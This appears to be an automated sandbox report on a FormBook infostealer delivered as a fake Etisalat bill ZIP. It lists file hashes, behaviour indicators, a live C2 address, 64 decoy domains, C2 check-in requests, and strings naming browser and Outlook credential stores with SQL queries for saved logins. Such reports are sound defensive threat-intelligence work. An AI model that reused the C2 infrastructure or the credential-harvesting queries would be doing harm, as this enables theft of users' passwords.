| File name: | Details of Your Etisalat Summary Bill for the Month of May-2024.zip |
| Full analysis: | https://app.any.run/tasks/d580ddcf-0af0-44f3-bb65-3dbb62402ddd |
| Verdict: | Malicious activity |
| Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
| Analysis date: | May 28, 2024, 07:18:14 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 7234662C06842B61DBED887447ABBCDC |
| SHA1: | 1CFFC92A5DD903C734073C2CC73BD9D774D56EF0 |
| SHA256: | 4A766DF7DF844E26BF42BB4018B1AEC0877BAF3C20D6AF7079AA0C2893977B2F |
| SSDEEP: | 24576:Jc02lLDR7dK0ZTkqJIcEgO7rMQsFNLP+CqXt5yS4nvg/3djghXZjY2EPm2rh+wtd:Jc02lLDR7dK0ZTkoIcEgO7rMQsFNLP+R |
MALICIOUS
Drops the executable file immediately after the start
- WinRAR.exe (PID: 3972)
FORMBOOK has been detected (YARA)
- wininit.exe (PID: 2072)
SUSPICIOUS
Starts CMD.EXE for commands execution
- wininit.exe (PID: 2072)
Reads the Internet Settings
- wininit.exe (PID: 2072)
INFO
Executable content was dropped or overwritten
- WinRAR.exe (PID: 3972)
Manual execution by a user
- wininit.exe (PID: 2072)
- Details of Your Etisalat Summary Bill for the Month of May-2024.exe (PID: 4060)
Reads security settings of Internet Explorer
- explorer.exe (PID: 1180)
- wininit.exe (PID: 2072)
Reads mouse settings
- Details of Your Etisalat Summary Bill for the Month of May-2024.exe (PID: 4060)
Create files in a temporary directory
- Details of Your Etisalat Summary Bill for the Month of May-2024.exe (PID: 4060)
Checks supported languages
- Details of Your Etisalat Summary Bill for the Month of May-2024.exe (PID: 4060)
- wmpnscfg.exe (PID: 524)
Reads the computer name
- wmpnscfg.exe (PID: 524)
Checks proxy server information
- wininit.exe (PID: 2072)
Reads the Internet Settings
- explorer.exe (PID: 1180)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Formbook
(PID) Process(2072) wininit.exe
C2www.1wxir.com/da29/
Strings (79)USERNAME
LOCALAPPDATA
USERPROFILE
APPDATA
TEMP
ProgramFiles
CommonProgramFiles
ALLUSERSPROFILE
/c copy "
/c del "
\Run
\Policies
\Explorer
\Registry\User
\Registry\Machine
\SOFTWARE\Microsoft\Windows\CurrentVersion
Office\15.0\Outlook\Profiles\Outlook\
NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
\SOFTWARE\Mozilla\Mozilla
\Mozilla
Username:
Password:
formSubmitURL
usernameField
encryptedUsername
encryptedPassword
\logins.json
\signons.sqlite
\Microsoft\Vault\
SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins
\Google\Chrome\User Data\Default\Login Data
SELECT origin_url, username_value, password_value FROM logins
.exe
.com
.scr
.pif
.cmd
.bat
ms
win
gdi
mfc
vga
igfx
user
help
config
update
regsvc
chkdsk
systray
audiodg
certmgr
autochk
taskhost
colorcpl
services
IconCache
ThumbCache
Cookies
SeDebugPrivilege
SeShutdownPrivilege
\BaseNamedObjects
config.php
POST
HTTP/1.1
Host:
Connection: close
Content-Length:
Cache-Control: no-cache
Origin: http://
User-Agent: Mozilla Firefox/4.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://
Accept-Language: en-US
Accept-Encoding: gzip, deflate
dat=
f-start
f-end
Decoy C2 (64)kas-travel.com
hy1618.net
biosrch.com
sharvellestudio.com
56416.ooo
953700958.com
500051.com
clic.coach
veriosg.xyz
aptsafety.com
cucinaconestilo.com
sercettopper.com
diycoldplungetub.com
hostingopinion.com
mediatechnologysolutions.com
nodogwifnohat.com
ethpiee.com
tragaperrasbares.com
bbbcf.top
jtxu6.top
sorgulama95.shop
myconc.pro
okb-ar.net
thanhdoanacademy.com
rlyadventures.com
maestrolipari.com
digitaluxsolution.com
zituahmed.com
h5yfdgtg.top
whalesnorkelingmirissa.online
indxriim-firsaxtllari.com
fopoliswhlvtjv.top
iransarafan.com
usedata.monster
mnasjdqw66775jqwe09qwjsqwx.vip
aphropay.com
myfreedomlyfe.com
vytennow.com
micheleditrana.com
babycarrot.fun
maltepede.site
618dfyy21.com
flickzbiz.fun
sshihi.top
xsports108.com
ideiastransformadoras.com
aerotyneholdings.com
expandyourbusinessdigital.com
crown777login.com
wheepexpress.com
openshiftstore.com
xzdkzsaczp.xyz
cycmedb.com
9sh3j02g8j.com
cemeku.sydney
functionalfossils.com
kenguru.ink
classicsty.com
directadz.com
scuffedwrapz.com
oxmoz.art
rusticstores.com
vietcadao.com
ai-infinite.net
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | - |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2024:05:27 13:07:34 |
| ZipCRC: | 0xb8a126d3 |
| ZipCompressedSize: | 634780 |
| ZipUncompressedSize: | 1068032 |
| ZipFileName: | Details of Your Etisalat Summary Bill for the Month of May-2024.exe |
Total processes
41
Monitored processes
7
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 524 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1180 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2072 | "C:\Windows\System32\wininit.exe" | C:\Windows\System32\wininit.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Start-Up Application Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
Formbook(PID) Process(2072) wininit.exe C2www.1wxir.com/da29/ Strings (79)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk systray audiodg certmgr autochk taskhost colorcpl services IconCache ThumbCache Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start f-end Decoy C2 (64)kas-travel.com hy1618.net biosrch.com sharvellestudio.com 56416.ooo 953700958.com 500051.com clic.coach veriosg.xyz aptsafety.com cucinaconestilo.com sercettopper.com diycoldplungetub.com hostingopinion.com mediatechnologysolutions.com nodogwifnohat.com ethpiee.com tragaperrasbares.com bbbcf.top jtxu6.top sorgulama95.shop myconc.pro okb-ar.net thanhdoanacademy.com rlyadventures.com maestrolipari.com digitaluxsolution.com zituahmed.com h5yfdgtg.top whalesnorkelingmirissa.online indxriim-firsaxtllari.com fopoliswhlvtjv.top iransarafan.com usedata.monster mnasjdqw66775jqwe09qwjsqwx.vip aphropay.com myfreedomlyfe.com vytennow.com micheleditrana.com babycarrot.fun maltepede.site 618dfyy21.com flickzbiz.fun sshihi.top xsports108.com ideiastransformadoras.com aerotyneholdings.com expandyourbusinessdigital.com crown777login.com wheepexpress.com openshiftstore.com xzdkzsaczp.xyz cycmedb.com 9sh3j02g8j.com cemeku.sydney functionalfossils.com kenguru.ink classicsty.com directadz.com scuffedwrapz.com oxmoz.art rusticstores.com vietcadao.com ai-infinite.net | |||||||||||||||
| 2104 | /c del "C:\Windows\System32\svchost.exe" | C:\Windows\System32\cmd.exe | — | wininit.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3972 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Details of Your Etisalat Summary Bill for the Month of May-2024.zip" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | ||||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
| 4060 | "C:\Users\admin\Desktop\Details of Your Etisalat Summary Bill for the Month of May-2024.exe" | C:\Users\admin\Desktop\Details of Your Etisalat Summary Bill for the Month of May-2024.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 0.0.7.7 Modules
| |||||||||||||||
| 4072 | "C:\Users\admin\Desktop\Details of Your Etisalat Summary Bill for the Month of May-2024.exe" | C:\Windows\System32\svchost.exe | — | Details of Your Etisalat Summary Bill for the Month of May-2024.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
6 513
Read events
6 433
Write events
71
Delete events
9
Modification events
| (PID) Process: | (1180) explorer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
| Operation: | write | Name: | CheckSetting |
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB0100000092A232898819FC409986D4784AF4219400000000020000000000106600000001000020000000968318B51BBA3C48F7EC0868F0CE68DA41C2E90323ABF8F142C8CA29CB5C5892000000000E80000000020000200000004DF698FD9D952F69A9E834DB84483ADC4C18F6CE2315D15024467DBA35E007363000000037F878449F021BBA62F51C0DD5F297819D3EF0C814A84B7068D301B8BBB3EFE651E046BAD5728F4264424254BBBDD66540000000B5B1D99F81838E013E316CA15E330F83C4CB1F66B46B1D5AE63B78AAB07536E43DB470C9E8CFCA06E32666724F83867D1DA025DE42D5F7B8CA98BB431A64DEC2 | |||
| (PID) Process: | (3972) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3972) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3972) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3972) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3972) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3972) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (3972) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\Details of Your Etisalat Summary Bill for the Month of May-2024.zip | |||
| (PID) Process: | (3972) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3972) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
Executable files
1
Suspicious files
3
Text files
1
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3972 | WinRAR.exe | C:\Users\admin\Desktop\Details of Your Etisalat Summary Bill for the Month of May-2024.exe | executable | |
MD5:5CBE85014BD3A467C5D877780B4FD2C0 | SHA256:134202829433D1FB9262976EF7DA28A971F219EFF5ACAFDF294FD4425E102981 | |||
| 4060 | Details of Your Etisalat Summary Bill for the Month of May-2024.exe | C:\Users\admin\AppData\Local\Temp\autB672.tmp | binary | |
MD5:AE5A62696A7A186A1CA962EEE2BE0201 | SHA256:CE7165EB4021A571BD2DC73ABDD3D4D1025D00EA8846AA632738779E991601A8 | |||
| 4060 | Details of Your Etisalat Summary Bill for the Month of May-2024.exe | C:\Users\admin\AppData\Local\Temp\fondaco | text | |
MD5:BA4CDFD1DF8FD9DD82D508E598A92BCD | SHA256:953AD6AD9D316C2179D27300FEBF00BD1FCD479C2F628F23C2FF37BC26B2569C | |||
| 4060 | Details of Your Etisalat Summary Bill for the Month of May-2024.exe | C:\Users\admin\AppData\Local\Temp\parachronistic | binary | |
MD5:161ED3AA7692829EE261E0F3219D44C6 | SHA256:7E298AA913FC1B0D6EEEE15FCC24743343F6D7AB5B830BB6336A9613583013B0 | |||
| 4060 | Details of Your Etisalat Summary Bill for the Month of May-2024.exe | C:\Users\admin\AppData\Local\Temp\autB642.tmp | binary | |
MD5:675EAE3EBCC065F3318FF21665A4F505 | SHA256:A3357EE6912FF447194CC6584516A148F351FBA65876024C29DBC635C91CA2A2 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
17
DNS requests
20
Threats
8
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1180 | explorer.exe | GET | 301 | 185.77.97.175:80 | http://www.zituahmed.com/da29/?-ZLTih=YI1PPrTIX1s8qpY9qKPwqnWN3Ky4syN0MRo0ro/aV4D2C8r8Ra6TLZ4ctzFTubiOxwlWjg==&2d=llzDUf | unknown | — | — | unknown |
1180 | explorer.exe | GET | — | 35.186.214.69:80 | http://www.953700958.com/da29/?-ZLTih=ppL+a6glvGU8XbXmv369zJcpO8bjAQP2EOgswkRKaqUA5zdk8QoeW0yiMzP/Oj3ta0d19A==&2d=llzDUf | unknown | — | — | unknown |
1180 | explorer.exe | GET | 302 | 150.95.255.38:80 | http://www.9sh3j02g8j.com/da29/?-ZLTih=sOfqzzHlcYA+b+vCn/AXHBHX2hqyQ1AO1Aj5aCxBfYcWC5ec6jfu2i9F+N9bBaaYmkC72Q==&2d=llzDUf | unknown | — | — | unknown |
1180 | explorer.exe | GET | 301 | 34.149.87.45:80 | http://www.maestrolipari.com/da29/?-ZLTih=YxmS3DCwPDjuI/7kfEYtWFJCnZydUmZtLvfq05Ja/pUo9OUKcxF/7QQnCGOrvNXLV5K85w==&2d=llzDUf | unknown | — | — | unknown |
1180 | explorer.exe | GET | 404 | 120.72.119.8:80 | http://www.thanhdoanacademy.com/da29/?-ZLTih=+pyk+eelcEd4E5UNF1pz/qSvPxTVOhkTcz3KojL0nKi7h6J38NXsRh2tdaRw0ns9l7wSAw==&2d=llzDUf | unknown | — | — | unknown |
1180 | explorer.exe | GET | 301 | 103.169.142.0:80 | http://www.babycarrot.fun/da29/?-ZLTih=SimhdrYEtuHj2w0LpTaXBSQqobCMaDaN6gAFN2dv1Iw29MB751hEh5If5zAFK4oiVesaKw==&2d=llzDUf | unknown | — | — | unknown |
1180 | explorer.exe | GET | 404 | 155.248.232.116:80 | http://www.kas-travel.com/da29/?-ZLTih=dut1VIrTRg4My37Z8x1gT5YAL1AGx3Ix/x/D50ACOxL9CUvFkgwfQqBgbHt1mX5nLkNFdA==&2d=llzDUf | unknown | — | — | unknown |
1180 | explorer.exe | GET | 301 | 190.115.24.78:80 | http://www.1wxir.com/da29/?-ZLTih=R0vht/vM/2EqW+qQ7TzhccCvBPqy5ItmLDdO5OE7UGktpqoMePeDo7jKdFTFEsfuI4M/ig==&2d=llzDUf | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
1180 | explorer.exe | 49.13.77.253:80 | www.usedata.monster | Hetzner Online GmbH | DE | unknown |
2072 | wininit.exe | 49.13.77.253:80 | www.usedata.monster | Hetzner Online GmbH | DE | unknown |
1180 | explorer.exe | 185.77.97.175:80 | www.zituahmed.com | Hostinger International Limited | NL | unknown |
1180 | explorer.exe | 150.95.255.38:80 | www.9sh3j02g8j.com | GMO Internet,Inc | JP | unknown |
1180 | explorer.exe | 35.186.214.69:80 | www.953700958.com | GOOGLE | US | unknown |
1180 | explorer.exe | 155.248.232.116:80 | www.kas-travel.com | ORACLE-BMC-31898 | CA | unknown |
1180 | explorer.exe | 34.149.87.45:80 | www.maestrolipari.com | GOOGLE | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.usedata.monster |
| unknown |
www.zituahmed.com |
| unknown |
www.9sh3j02g8j.com |
| unknown |
www.xzdkzsaczp.xyz |
| unknown |
www.953700958.com |
| unknown |
www.kas-travel.com |
| unknown |
www.maestrolipari.com |
| unknown |
www.thanhdoanacademy.com |
| unknown |
www.myfreedomlyfe.com |
| unknown |
www.indxriim-firsaxtllari.com |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
— | — | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
— | — | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
— | — | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
— | — | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
— | — | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
— | — | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
— | — | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |